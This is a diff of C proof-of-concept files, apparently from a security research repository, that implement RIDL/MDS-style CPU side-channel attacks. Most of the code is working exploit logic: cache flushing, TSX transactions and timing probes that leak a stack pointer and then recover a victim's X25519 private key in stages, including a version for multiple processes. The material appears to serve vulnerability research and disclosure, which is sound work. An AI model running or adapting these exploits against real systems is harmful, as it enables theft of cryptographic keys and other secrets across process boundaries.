+// rol:    rotate count applied to the masked value before it is used as an
+//         index.
+//
+// Inside the transaction the prefetch address is probe1 + rotated value, so
+// probe1 itself is touched when (loaded ^ prefix) & mask is zero.
+//
+// Returns 0 if probe1 is measured as cached afterwards, -1 otherwise.
+static int ridl_confirm(unsigned long off, unsigned long prefix, size_t mask, unsigned int rol) {
+  if ((off & 0x3f) > 0x38) {
+    printf("\n\nERROR\n");
+    printf("Trying RIDL on cross-cacheline offset!\n\n");
+    exit(1);
+  }
+  // Start from a known state: probe1 must not be cached before the attempt.
+  _mm_clflush(probe1);
+  _mm_mfence();
+
+  // Evict target cache line - code works without it, but much worse.
+  // `sum` is volatile so the reads are not optimized away.
+  volatile int sum = 0;
+  for (int i = 0; i < EVICT; i++) {
+    sum += ((volatile char*)evict_addr)[i*4096+(off&4095)];
+  }
+  asm volatile(
+      "mov ecx, %4\n\t"        // rotate count goes in cl
+      //"mov r15, 16\n\t"
+      "mov r14, %2\n"          // r14 = probe1 base
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "clflush [%0 + 256]\n\t"
+      "xbegin 2f\n\t"          // an abort resumes at label 2
+
+      //xbegin block:
+      "mov   rax, [%0]\n\t"
+      "xor   rax, %1\n\t"
+      "and rax, %3\n\t"
+      "rol rax, cl\n\t" // Doesn't matter too much, [10:50]
+      "prefetchnta [rax+r14]\n"
+
+      "xend\n\t"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3+(off&0x3f)), "r"(prefix), "r"(probe1), "r"(mask), "r"(rol)
+      : "rbx", "rax", "rcx", "rdx", "r15", "r14");
+
+  if (is_cached(probe1)) { return 0; }
+  return -1;
+}
+
+
+// Maps the probe1, probe3 and eviction regions at their fixed addresses and
+// fills each with 0x99 so the pages are actually backed. Exits via err() if
+// any mapping does not land at the requested address.
+void map() {
+  const int prot = PROT_READ|PROT_WRITE;
+  const int flags = MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE;
+  const size_t page_len = 4096;
+  const size_t evict_len = 4096*4096;
+  void *got;
+
+  got = mmap(probe1, page_len, prot, flags, -1, 0);
+  if (got != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, page_len);
+
+  got = mmap(probe3, page_len, prot, flags, -1, 0);
+  if (got != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, page_len);
+
+  got = mmap(evict, evict_len, prot, flags, -1, 0);
+  if (got != evict) {
+    err(1, "mmap(evict)");
+  }
+  memset(evict, 0x99, evict_len);
+}
+
+// Prints the 32-byte secret as hex: bytes 0..up_to are shown, the remaining
+// positions up to index 31 are printed as "??".
+void print_secret(unsigned char* secret, int up_to) {
+  printf("Secret:");
+  int known = 0;
+  while (known <= up_to) {
+    printf(" %02x", secret[known]);
+    known++;
+  }
+  int unknown = up_to + 1;
+  while (unknown < 32) {
+    printf(" ??");
+    unknown++;
+  }
+  printf("\n");
+}
+
+// A candidate value `i` together with the number of hits `cnt` it scored.
+typedef struct pair {
+  unsigned short i;
+  unsigned short cnt;
+} pair;
+
+// qsort comparator ordering pairs by descending hit count.
+int cmp(const void* a, const void* b) {
+  const unsigned short lhs = ((const pair*)a)->cnt;
+  const unsigned short rhs = ((const pair*)b)->cnt;
+  return (lhs < rhs) - (lhs > rhs);
+}
+
+// Prints the up-to-25 highest non-zero counters out of 256, best first, as
+// "count: value", followed by a note on how many further non-zero entries
+// were not shown.
+void print_results(unsigned short *results) {
+  enum { NUM_VALUES = 256, TOPN = 25 };
+  pair ranked[NUM_VALUES];
+  int nonzero = 0;
+
+  for (int value = 0; value < NUM_VALUES; value++) {
+    ranked[value].i = value;
+    ranked[value].cnt = results[value];
+    if (results[value] > 0) {
+      nonzero++;
+    }
+  }
+  qsort(ranked, NUM_VALUES, sizeof(ranked[0]), cmp);
+
+  for (int rank = 0; rank < TOPN; rank++) {
+    if (ranked[rank].cnt == 0) {
+      continue;
+    }
+    printf("%05u: %02x\n", ranked[rank].cnt, (unsigned int)ranked[rank].i);
+  }
+  if (nonzero > TOPN) {
+    printf("[%d small skipped]\n", nonzero - TOPN);
+  }
+}
+
+// Same report as print_results, but over 512 counters whose index is shown
+// shifted left by 3.
+void print_results3(unsigned short* results) {
+  enum { NUM_VALUES = 512, TOPN = 25 };
+  pair ranked[NUM_VALUES];
+  int nonzero = 0;
+
+  for (int value = 0; value < NUM_VALUES; value++) {
+    ranked[value].i = value;
+    ranked[value].cnt = results[value];
+    if (results[value] > 0) {
+      nonzero++;
+    }
+  }
+  qsort(ranked, NUM_VALUES, sizeof(ranked[0]), cmp);
+
+  for (int rank = 0; rank < TOPN; rank++) {
+    if (ranked[rank].cnt == 0) {
+      continue;
+    }
+    printf("%05u: %03x\n", ranked[rank].cnt, (unsigned int)ranked[rank].i<<3);
+  }
+  if (nonzero > TOPN) {
+    printf("[%d small skipped]\n", nonzero - TOPN);
+  }
+}
+
+// Returns the index (0..255) of the largest counter; on ties the lowest
+// index wins.
+int get_best(unsigned short *results) {
+  int winner = 0;
+  for (int cand = 1; cand < 256; cand++) {
+    if (results[cand] > results[winner]) {
+      winner = cand;
+    }
+  }
+  return winner;
+}
+
+#define BITS_AT_A_TIME 2
+// Recovers BITS_AT_A_TIME bits at bit position mask_off and folds them into
+// *prefix.
+//
+// The new bit positions are first added to *mask. Then, for up to 1,000,000
+// rounds, every candidate value for those bits is OR-ed into *prefix and
+// tested with ridl_confirm(); each hit increments that candidate's counter.
+//
+// prefix/mask: in/out; *mask always gains the new bits, *prefix gains the
+//              winning candidate only on success.
+// off, rol:    passed through to ridl_confirm().
+//
+// Returns the winning candidate value, or -1 ("Signal lost") when the best
+// counter is below 20.
+ssize_t leak_and_move(size_t* prefix, size_t* mask, size_t mask_off, size_t off, int rol) {
+  *mask |= ((1ull << BITS_AT_A_TIME) - 1) << mask_off;
+
+  // Only the first (1 << BITS_AT_A_TIME) entries are written; the array is
+  // 256 wide because get_best() and print_results() scan 256 entries.
+  unsigned short results[256] = {0};
+  for (int i = 0; i < 1000000; i++) {
+    /*if (i == 2000000) {
+      int best = get_best(results);
+      if (results[best] < 20) {
+        printf("Weak signal...\n");
+        return -1;
+      }
+    }*/
+    if (i % 256 == 0) {
+      // Quick check.
+      int bestfor = get_best(results);
+      int is_ok = 1;
+      for (int j = 0; j < (1<<BITS_AT_A_TIME); j++) {
+        if (j == bestfor) continue;
+        // If only 1's are leaked:
+        // 20 1's, 0 0's is the threshold
+        // If the ratio is roughly constant:
+        // Must be 3x as many 1's
+        // (the +10 on both sides keeps the ratio defined when a count is 0)
+        if ((results[bestfor] + 10) * 100 / (results[j] + 10) < 300) {
+          is_ok = 0;
+        }
+      }
+      if (is_ok) {
+        printf("Quick stop threshold reached.\n");
+        break;
+      }
+    }
+    for (size_t nibble = 0; nibble < (1<<BITS_AT_A_TIME); nibble++) {
+      size_t this_prefix = *prefix | (nibble << mask_off);
+      int byte = ridl_confirm(off, this_prefix, *mask, rol);
+      if (byte == -1) {
+        continue;
+      }
+      results[nibble]++;
+      // Progress indicator: one dot per hit.
+      printf(".");
+      fflush(stdout);
+    }
+  }
+
+  printf("\n\n");
+  print_results(results);
+  printf("\n");
+  size_t best = get_best(results);
+  if (results[best] < 20) {
+    printf("Signal lost\n");
+    return -1;
+  }
+  *prefix |= best << mask_off;
+  return best;
+}
+
+// Step 1: finds which offset inside the cache line yields the expected
+// value.
+//
+// Probes offsets 0xa, 0x1a and 0x2a for 1,000,000 rounds each with a fixed
+// prefix/mask and counts hits per offset. Exits the process if no offset
+// ever hit.
+//
+// Returns the offset with the most hits.
+size_t stage1() {
+  printf("Step 1: Find cache line offset\n");
+  size_t prefix = 0x0000001a66666666ull;
+  size_t mask   = 0x000fFFFFffffFFFFull;
+  // Jumping by 16 due to stack alignment.
+  unsigned short results[256] = {0};
+  for (int i = 0; i < 1000000; i++) {
+    for (int offset = 0xa; offset <= 0x40 - 8; offset += 16) {
+      int byte = ridl_confirm(offset, prefix, mask, 15);
+      if (byte != -1) {
+        results[offset]++;
+        printf(".");
+        fflush(stdout);
+      }
+    }
+  }
+  printf("\n");
+  print_results(results);
+  size_t best_offset = get_best(results);
+  if (results[best_offset] == 0) {
+    printf("FAILED\n");
+    exit(1);
+  }
+  // best_offset is a size_t, so it needs the z length modifier.
+  printf("Best offset: 0x%02zx with cnt = %d\n", best_offset, results[best_offset]);
+  printf("\n\n");
+  return best_offset;
+}
+
+// Step 2: leaks bits 52..59 of the qword at cache-line offset `off`, two
+// bits at a time, and derives the value reported as the stack pointer from
+// the top 16 bits of the recovered prefix.
+//
+// Exits the process when the low 6 bits of that value do not match
+// (off + 0x36) & 0x3f.
+//
+// Returns the recovered value.
+size_t stage2(size_t off) {
+  printf("Step 2: Leak stack pointer\n");
+  size_t prefix = 0x0000001a66666666ull;
+  size_t mask   = 0x000fFFFFffffFFFFull;
+  int rol = 32;
+  for (int nib_ind = 0; nib_ind < 8 / BITS_AT_A_TIME; nib_ind++) {
+    // NOTE(review): a -1 ("Signal lost") result is ignored here; the layout
+    // check below is the only guard against a bad leak.
+    leak_and_move(&prefix, &mask, 52 + nib_ind * BITS_AT_A_TIME, off, rol);
+  }
+  // Kept as size_t so it matches both the %zx conversion and the return type.
+  size_t saved_rbp = prefix >> 48;
+  printf("\n\n");
+  printf("Result: stack pointer = 0x%zx\n", saved_rbp);
+  if (((off + 0x36) & 0x3f) != (saved_rbp & 0x3f)) {
+    printf("ERROR: rbp not at expected offset, memory layout might have changed since exploit development.\n");
+    exit(1);
+  }
+  return saved_rbp;
+}
+
+int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret);
+void stage5(size_t secret_offset, unsigned char* secret);
+
+// Step 3: searches for the first bits of the secret, then drives stages 4
+// and 5 for every promising guess. Never returns (loops forever).
+//
+// Each outer iteration:
+//   1. prints all secrets recovered so far;
+//   2. probes every guess in [STAGE3_START, STAGE3_END) in steps of 8,
+//      REPS3 times each, counting hits (counters saturate at 0xfffe);
+//   3. for every guess with at least 10 hits, re-measures it at `off` and at
+//      `off + 0x140`; the guess is kept only if the first location hits at
+//      least 3x as often;
+//   4. runs stage4/stage5 on accepted guesses and discards results that do
+//      not have the clamped X25519 top byte.
+// A counter value of 0xffff marks a guess that was already tried.
+//
+// secret_offset: offset of the secret; probing happens at secret_offset - 2.
+// saved_rbp:     unused.
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  (void)saved_rbp;
+  printf("Step 3: Guess 5 bits of secret.\n");
+  printf("Leaking at offset = 0x%zx, prefix = 0xXYZ0000\n", secret_offset - 2);
+
+#define STAGE3_START 0
+#define STAGE3_END (1<<8)
+//#define STAGE3_START 0xe80
+//#define STAGE3_END   0xe88
+  static unsigned char potential_secrets[0x1000][32];
+  int leaked_secrets = 0;
+  size_t off = secret_offset-2;
+  size_t mask = 0x00ffFFF8;
+#define REPS3 100000
+
+  unsigned short results[1<<9] = {0};
+  int iter = 0;
+  while (1) {
+    printf("iter=%d\n", ++iter);
+    // Slots are written modulo 0x1000, so never read past the array.
+    for (int i = 0; i < leaked_secrets && i < 0x1000; i++) {
+      print_secret(potential_secrets[i], 31);
+    }
+    for (size_t guess = STAGE3_START; guess < STAGE3_END; guess += 1<<3) {
+      if (guess == 0) continue;
+      if (results[guess>>3] >= 0xfffeu) continue;
+      for (int times = 0; times < REPS3; times++) {
+        size_t prefix = (guess << 16) | 0x8; // This 0x8 is guessed...
+        int byte = ridl_confirm(off, prefix, mask, 23);
+        if (byte != -1 && results[guess>>3] < 0xfffeu) {
+          results[guess>>3]++;
+        }
+      }
+    }
+    print_results3(results);
+    for (int i = 0; i < (1<<9); i++) {
+      if (results[i] < 10 || results[i] == 0xffffu) continue;
+      size_t guess = i << 3;
+      // guess is a size_t, so it needs the z length modifier.
+      printf("Trying guess = %04zx.\n", guess);
+      results[i] = 0xffff;
+      // One last check: does leaking from off + 0x140 give similar leakage?
+      int normal = 0;
+      int fake = 0;
+      for (int k = 0; k < iter*10; k++) {
+        printf("Precheck: %d/%d...\n", k, iter*10);
+        for (int j = 0; j < REPS3; j++) {
+          size_t prefix = (guess << 16) | 0x8;
+          int byte = ridl_confirm(off, prefix, mask, 23);
+          if (byte != -1) {
+            normal++;
+          }
+        }
+        for (int j = 0; j < REPS3; j++) {
+          size_t prefix = (guess << 16) | 0x8;
+          int byte = ridl_confirm(off + 0x140, prefix, mask, 23);
+          if (byte != -1) {
+            fake++;
+          }
+        }
+      }
+      // Expecting normal~100, fake~0
+      int ratio = (normal+10)*100/(fake+10);
+      printf("Preliminary check: normal %d; fake %d - ratio = %d\n", normal, fake, ratio);
+
+      if (ratio < 300) {
+        printf("Ratio too weak, ignoring.\n");
+        continue;
+      }
+      // unsigned char*, matching both the array and the stage4/stage5
+      // prototypes.
+      unsigned char* secret = potential_secrets[leaked_secrets & 0xfff];
+      leaked_secrets++;
+      int rv = stage4(guess, secret_offset, secret);
+      if (rv == 0) {
+        leaked_secrets--;
+        continue;
+      }
+      stage5(secret_offset, secret);
+      // From the boringssl code:
+      // e[31] &= 127;
+      // e[31] |= 64;
+      if ((secret[31] & 128) != 0 || (secret[31] & 64) != 64) {
+        printf("We leaked something, but it doesn't match the key format.\n");
+        leaked_secrets--;
+        continue;
+      }
+    }
+  }
+}
+
+// Stage 4: leaks secret bytes 1..5, BITS_AT_A_TIME bits per step, starting
+// from the stage-3 guess.
+//
+// Clears `secret` (32 bytes), seeds bytes 0 and 1 from best_guess, then for
+// each byte calls leak_and_move() with a growing prefix/mask. The rotate
+// count goes 24, 16, 8, 0, 0 for bytes 1..5.
+//
+// Returns 1 on success, 0 as soon as one step loses the signal.
+int stage4(size_t best_guess, size_t secret_offset, unsigned char* secret) {
+  printf("\nStage 4: Leak secret[:6].\n");
+
+  const size_t off = secret_offset - 2;
+  const int steps_per_byte = 8 / BITS_AT_A_TIME;
+  size_t known_mask = 0x0000ffFFF8;
+  size_t known_bits = (best_guess << 16) | 0x8; // This 0x8 is guessed...
+
+  memset(secret, 0, 32);
+  secret[0] = best_guess & 0xff;
+  secret[1] = best_guess >> 8;
+
+  for (int ind = 1; ind < 6; ind++) {
+    const int rol = (ind <= 4) ? 32 - 8 * ind : 0;
+    int nib_ind = 0;
+    while (nib_ind < steps_per_byte) {
+      const int shift = nib_ind * BITS_AT_A_TIME;
+      //if (ind == 1 && nib_ind < 4 / BITS_AT_A_TIME) { continue; }
+      printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n",
+             off, ind, nib_ind, known_bits, known_mask);
+      ssize_t best = leak_and_move(&known_bits, &known_mask, 16+ind*8+shift,
+                                   off, rol);
+      if (best == -1) {
+        return 0;
+      }
+      secret[ind] |= best << shift;
+      nib_ind++;
+    }
+    print_secret(secret, ind);
+  }
+  return 1;
+}
+
+// Stage 5: leaks secret bytes 6..31 with a sliding window.
+//
+// The six bytes already known form the low part of the prefix; each step
+// recovers the top byte (bits 56..63) BITS_AT_A_TIME bits at a time, then
+// the prefix is shifted down by one byte and the probe offset advances.
+// Returns early, leaving `secret` partially filled, when a step loses the
+// signal.
+void stage5(size_t secret_offset, unsigned char* secret) {
+  printf("\nStage 5: Leak secret[6:].\n");
+
+  const int rol = 56;
+  const int steps_per_byte = 8 / BITS_AT_A_TIME;
+
+  size_t window = 0;
+  for (int known = 0; known < 6; known++) {
+    window |= ((size_t)secret[known]) << (8*known+8);
+  }
+
+  for (int ind = 6; ind < 32; ind++) {
+    size_t mask = 0x00ffFFFFffffFFFFull;
+    const size_t off = secret_offset - 7 + ind;
+    int nib_ind = 0;
+    while (nib_ind < steps_per_byte) {
+      const int shift = nib_ind * BITS_AT_A_TIME;
+      printf("Leaking at offset = 0x%zx (%d:%d), prefix = 0x%zx, mask = 0x%zx\n",
+             off, ind, nib_ind, window, mask);
+      ssize_t best = leak_and_move(&window, &mask, 56 + shift, off, rol);
+      if (best == -1) {
+        return;
+      }
+      secret[ind] |= best << shift;
+      nib_ind++;
+    }
+    print_secret(secret, ind);
+    window >>= 8;
+  }
+}
+
+// Runs the whole attack: maps the probe regions, finds the cache-line
+// offset, leaks the stack pointer, derives the secret's page offset from it
+// and hands over to stage 3 (which drives stages 4 and 5).
+void run() {
+  map();
+
+  const size_t line_off = stage1();
+  const size_t rbp = stage2(line_off);
+  const size_t secret_off = (rbp + 0xa0) & 0xfffu;
+  printf("Secret offset = 0x%zx\n", secret_off);
+  printf("\n\n");
+
+  // Stage 3 calls stage 4 and 5
+  stage3(secret_off, rbp);
+}
+
+// Program entry point: runs the attack.
+int main() {
+  run();
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/leak_intermediate_x25519.c b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c
new file mode 100644
index 00000000..68e18317
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_intermediate_x25519.c
@@ -0,0 +1,310 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#define CACHE_MISS 100
+
+// Times a single load from ptr1 and classifies it as a cache hit or miss.
+//
+// The inline assembly is Intel syntax (the Makefile builds with
+// -masm=intel). The load sits between an RDTSC and an RDTSCP, with fences
+// before and after; the low 32 bits of the timestamp difference end up in
+// `diff`.
+//
+// Returns 1 when the measured delta is below CACHE_MISS, 0 otherwise.
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"cpuid\n\t"
+      "mfence\n\t"
+      "lfence\n\t"
+      "RDTSC\n\t"             // first timestamp
+      "mov rbx, rax\n\t"      // keep it in rbx
+      "mov rdx, [%1]\n\t"     // the load being timed
+      "RDTSCP\n\t"            // second timestamp
+      "lfence\n\t"
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+
+      // Result comes back in ebx; the pointer is passed in rsi.
+      : "=b" (diff)
+      : "S"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x7895e4000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+
+
+// Tests whether a transient load yields the 64-bit value `prefix`.
+//
+// prefix is XORed with probe1_addr up front, so inside the transaction
+// (loaded ^ prefix) equals probe1's address exactly when the loaded value
+// matches the caller's prefix; the prefetch then touches probe1.
+//
+// probe1 is flushed first, the transactional sequence is attempted 32 times,
+// and finally probe1 is timed.
+//
+// Returns 0 if probe1 is measured as cached afterwards, -1 otherwise.
+static int mlpds(unsigned long prefix) {
+  prefix ^= probe1_addr;
+  _mm_clflush(probe1);
+  _mm_mfence();
+  _mm_sfence();
+  _mm_lfence();
+  asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory");
+
+
+  // TODO find optimal number of iterations.
+  for (int i = 0; i < 32; i++) {
+  asm volatile(
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "xbegin 2f\n\t"          // an abort resumes at label 2
+
+      //xbegin block:
+      // Load from address -1. NOTE(review): presumably this always faults
+      // and aborts the transaction -- confirm.
+      "mov   rax, [-1]\n\t"
+      "xor   rax, %1\n\t"
+      "prefetchnta [rax]\n"
+
+      "xend\n\t"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      // Spins forever if execution ever gets here without an abort.
+      "3: jmp 3b\n"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3), "r"(prefix)
+      : "rax");
+  }
+
+  int p1 = is_cached(probe1);
+  if (p1) { return 0; }
+  return -1;
+}
+
+
+// Maps one page each for probe1 and probe3 at their fixed addresses and
+// fills them with 0x99 so the pages are actually backed. Exits via err() if
+// a mapping does not land at the requested address.
+void map() {
+  const int prot = PROT_READ|PROT_WRITE;
+  const int flags = MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE;
+  const size_t page_len = 4096;
+  void *got;
+
+  got = mmap(probe1, page_len, prot, flags, -1, 0);
+  if (got != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, page_len);
+
+  got = mmap(probe3, page_len, prot, flags, -1, 0);
+  if (got != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, page_len);
+}
+
+// Prints the 32 bytes at `secret` as space-separated two-digit hex on one
+// line.
+void print_secret(unsigned char* secret) {
+  const unsigned char* const end = secret + 32;
+  printf("Secret:");
+  for (const unsigned char* p = secret; p != end; ++p) {
+    printf(" %02x", *p);
+  }
+  printf("\n");
+}
+
+// Sets bit number `bit` of the little-endian byte array `privkey` to `to`
+// (expected to be 0 or 1). Negative bit numbers are ignored.
+void set_bit(uint8_t* privkey, int bit, int to) {
+  if (bit >= 0) {
+    uint8_t* cell = &privkey[bit / 8];
+    const int shift = bit & 7;
+    *cell = (*cell & ~(1 << shift)) | (to << shift);
+  }
+}
+
+int X25519_fake(uint8_t* out, const uint8_t* privkey,
+                const uint8_t* peer_pubkey, int iteration);
+
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+// Recovers the victim's X25519 private key bit by bit.
+//
+// Reads a 32-byte client private key (hex bytes) from stdin, derives the
+// matching public key, and optionally resumes from /tmp/checkpoint (an
+// iteration number followed by 32 hex key bytes). Then, for each ladder
+// iteration from the start iteration down to 3:
+//   - computes the 40-byte intermediate value X25519_fake() produces for
+//     each of the four settings of key bits (iteration, iteration-1);
+//   - repeatedly asks mlpds() whether each of the 5 qwords of each candidate
+//     is observed, until the hit counts of the "bit = 0" and "bit = 1"
+//     candidates differ by at least MARGIN;
+//   - fixes key bit `iteration` accordingly.
+// Finally clears the low three key bits and prints the key.
+//
+// Both parameters are unused.
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  (void)secret_offset;
+  (void)saved_rbp;
+
+  uint8_t pubkey[32];
+  uint8_t client_privkey[32];
+  printf("Input client private key:\n");
+  for (int i = 0; i < 32; i++) {
+    unsigned int n;
+    // A short or malformed input would otherwise leave `n` uninitialized.
+    if (scanf("%x", &n) != 1) {
+      errx(1, "expected 32 hex bytes for the client private key");
+    }
+    client_privkey[i] = n;
+  }
+  X25519_public_from_private(pubkey, client_privkey);
+  for (int i = 0; i < 32; i++) {
+    printf("%02x ", client_privkey[i]);
+  }
+  printf("\n");
+  for (int i = 0; i < 32; i++) {
+    printf("%02x ", pubkey[i]);
+  }
+  printf("\n");
+  uint8_t privkey[32] = {0};
+  privkey[31] &= 127;
+  privkey[31] |= 64;
+  uint8_t out[40];
+  // The algorithm starts at that iteration.
+  int start_iteration = 253;
+
+  // Check if checkpoint available.
+  FILE* f = fopen("/tmp/checkpoint", "r");
+  if (!f) {
+    printf("Starting from scratch.\n");
+  }
+  else {
+    printf("Starting from checkpoint.\n");
+    // set_bit() indexes privkey[iteration / 8], so anything above 255 would
+    // write past the 32-byte key.
+    if (fscanf(f, "%d", &start_iteration) != 1 || start_iteration > 255) {
+      errx(1, "malformed /tmp/checkpoint: bad iteration");
+    }
+    for (int i = 0; i < 32; i++) {
+      unsigned int n;
+      if (fscanf(f, "%x", &n) != 1) {
+        errx(1, "malformed /tmp/checkpoint: expected 32 hex key bytes");
+      }
+      privkey[i] = n;
+    }
+    fclose(f);
+  }
+
+  print_secret(privkey);
+
+#define MARGIN 3
+
+  // Ending on iteration 3, since bits 2, 1 and 0 are unset.
+  for (int iteration = start_iteration; iteration >= 3; iteration--) {
+    unsigned short results[4][5] = {0};
+    size_t poss[4][5] = {{0}};
+    _Static_assert(sizeof(poss[0]) == sizeof(out),
+                   "a candidate row must hold the whole 40-byte ladder value");
+
+    // iteration - 2 if you want to look at two bits.
+    // iteration - 1 if you want to look at one bit.
+    int x_it = iteration - 1;
+    if (x_it < 0) x_it = 0;
+
+    // Candidate k encodes (bit[iteration], bit[iteration-1]) = (k >> 1, k & 1).
+    // One ladder run per candidate yields all five qwords; memcpy avoids
+    // reading the byte buffer through a size_t pointer.
+    for (int k = 0; k < 4; k++) {
+      set_bit(privkey, iteration, k >> 1);
+      set_bit(privkey, iteration-1, k & 1);
+      X25519_fake(out, privkey, pubkey, x_it);
+      memcpy(poss[k], out, sizeof(poss[k]));
+    }
+
+    printf("iter=%d\nTargets:\n", iteration);
+    for (int i = 0; i < 5; i++) {
+      for (int j = 0; j < 4; j++) {
+        printf("%016zx ", poss[j][i]);
+      }
+      printf("\n");
+    }
+    int diff_abs;
+    int bit;
+    do {
+      for (int times = 0; times < 20000; times++) {
+        for (int k = 0; k < 4; k++) {
+          for (int wq = 0; wq < 5; wq++) {
+            int byte = mlpds(poss[k][wq]);
+            if (byte != -1) {
+              // Oddly enough, this printf is sometimes necessary... Otherwise exploit
+              // occasionally breaks.
+              //printf("res: %d\n", byte);
+              results[k][wq]++;
+            }
+          }
+        }
+      }
+      // Counts accumulate across rounds of this do/while.
+      int sums[4] = {0};
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          sums[ij] += results[ij][wq];
+        }
+        printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]);
+      }
+
+#if 1
+      //version for iteration - 1
+      // Candidates 0 and 1 have bit[iteration] = 0; 2 and 3 have it set.
+      int x0 = sums[0] + sums[1];
+      int x1 = sums[2] + sums[3];
+      diff_abs = x0 - x1;
+      if (diff_abs < 0) diff_abs = -diff_abs;
+      bit = x1 > x0;
+      printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1);
+#else
+      //version for iteration - 2
+      int top = -1, topind = -1, top2 = -1, top2ind = -1;
+      for (int ij = 0; ij < 4; ij++) {
+        if (sums[ij] > top) {
+          top2 = top;
+          top2ind = topind;
+          top = sums[ij];
+          topind = ij;
+        }
+        else if (sums[ij] > top2) {
+          top2 = sums[ij];
+          top2ind = ij;
+        }
+      }
+      diff_abs = top - top2;
+      bit = topind >= 2;
+      printf("--- diff_abs %d (top1 %d vs. top2 %d vs. total %d)\n", diff_abs, top, top2, sums[0]+sums[1]+sums[2]+sums[3]);
+#endif
+    } while (diff_abs < MARGIN);
+    set_bit(privkey, iteration-1, 0);
+    set_bit(privkey, iteration, bit);
+    print_secret(privkey);
+  }
+  privkey[0] &= 248;
+  print_secret(privkey);
+}
+
+// Maps the probe pages, then starts the key-recovery loop; stage3() ignores
+// both of its arguments.
+void run() {
+  map();
+  stage3(0, 0);
+}
+
+// Program entry point: runs the attack.
+int main() {
+  run();
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/leak_multiprocess.c b/pocs/cpus/mds-x25519/leak_multiprocess.c
new file mode 100644
index 00000000..a216ea3c
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_multiprocess.c
@@ -0,0 +1,368 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/wait.h>
+#include <sched.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+#include <errno.h>
+
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#define CACHE_MISS 100
+
+// Times a single load from ptr1 and classifies it as a cache hit or miss.
+//
+// The inline assembly is Intel syntax (the Makefile builds with
+// -masm=intel). The load sits between an RDTSC and an RDTSCP, with fences
+// before and after; the low 32 bits of the timestamp difference end up in
+// `diff`.
+//
+// Returns 1 when the measured delta is below CACHE_MISS, 0 otherwise.
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"cpuid\n\t"
+      "mfence\n\t"
+      "lfence\n\t"
+      "RDTSC\n\t"             // first timestamp
+      "mov rbx, rax\n\t"      // keep it in rbx
+      "mov rdx, [%1]\n\t"     // the load being timed
+      "RDTSCP\n\t"            // second timestamp
+      "lfence\n\t"
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+
+      // Result comes back in ebx; the pointer is passed in rsi.
+      : "=b" (diff)
+      : "S"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x7895e4000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+
+
